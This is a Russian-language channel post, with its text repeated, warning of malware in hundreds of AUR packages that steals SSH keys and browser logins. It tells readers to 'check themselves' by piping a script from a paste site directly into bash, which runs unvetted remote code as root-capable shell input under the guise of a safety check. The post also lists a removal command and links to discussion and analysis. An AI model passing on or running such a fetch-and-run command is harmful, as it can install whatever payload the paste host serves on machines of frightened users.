опубликовали
❗️Малварь в AUR
Народ, в AUR последние пару дней раздают заразу. Сотни пакетов — не один, не два, а реально много, в том числе те, что ставят обычные люди. Воровать умеет SSH-ключи, логины из браузеров, возможно, цепляет руткит.
Если что-то ставили или обновляли из AUR за последние дни — проверьтесь:
"curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | bash"
Заражённый пакет сносится через sudo pacman -Rdd имя_пакета.
Пока полной картины нет, но вывод простой: AUR сейчас не трогаем, пока не разберутся. Честно говоря, это хорошее напоминание, что AUR всегда был зоной «сам себе режиссёр».
Ссылки для тех, кто хочет копнуть глубже:
• Обсуждение на списке рассылки: https://lists.archlinux.org/archives/list/[email protected]/thread/FGXPCB3ZVCJIV7FX323SBAX2JHYB7ZS4/
• Предварительный разбор: https://ioctl.fail/preliminary-analysis-of-aur-malware/
• Скрипт проверки: https://gist.github.com/Kidev/59bf9f5fb53ab5eee99f19a6a2fc3992
Берегите свои машины.
https://t.me/os_world_channel Показать больше
Народ, в AUR последние пару дней раздают заразу. Сотни пакетов — не один, не два, а реально много, в том числе те, что ставят обычные люди. Воровать умеет SSH-ключи, логины из браузеров, возможно, цепляет руткит.
Если что-то ставили или обновляли из AUR за последние дни — проверьтесь:
"curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | bash"
Заражённый пакет сносится через sudo pacman -Rdd имя_пакета.
Пока полной картины нет, но вывод простой: AUR сейчас не трогаем, пока не разберутся. Честно говоря, это хорошее напоминание, что AUR всегда был зоной «сам себе режиссёр».
Ссылки для тех, кто хочет копнуть глубже:
• Обсуждение на списке рассылки: https://lists.archlinux.org/archives/list/[email protected]/thread/FGXPCB3ZVCJIV7FX323SBAX2JHYB7ZS4/
• Предварительный разбор: https://ioctl.fail/preliminary-analysis-of-aur-malware/
• Скрипт проверки: https://gist.github.com/Kidev/59bf9f5fb53ab5eee99f19a6a2fc3992
Берегите свои машины.
https://t.me/os_world_channel Показать больше
Автор:
Артём Добрый
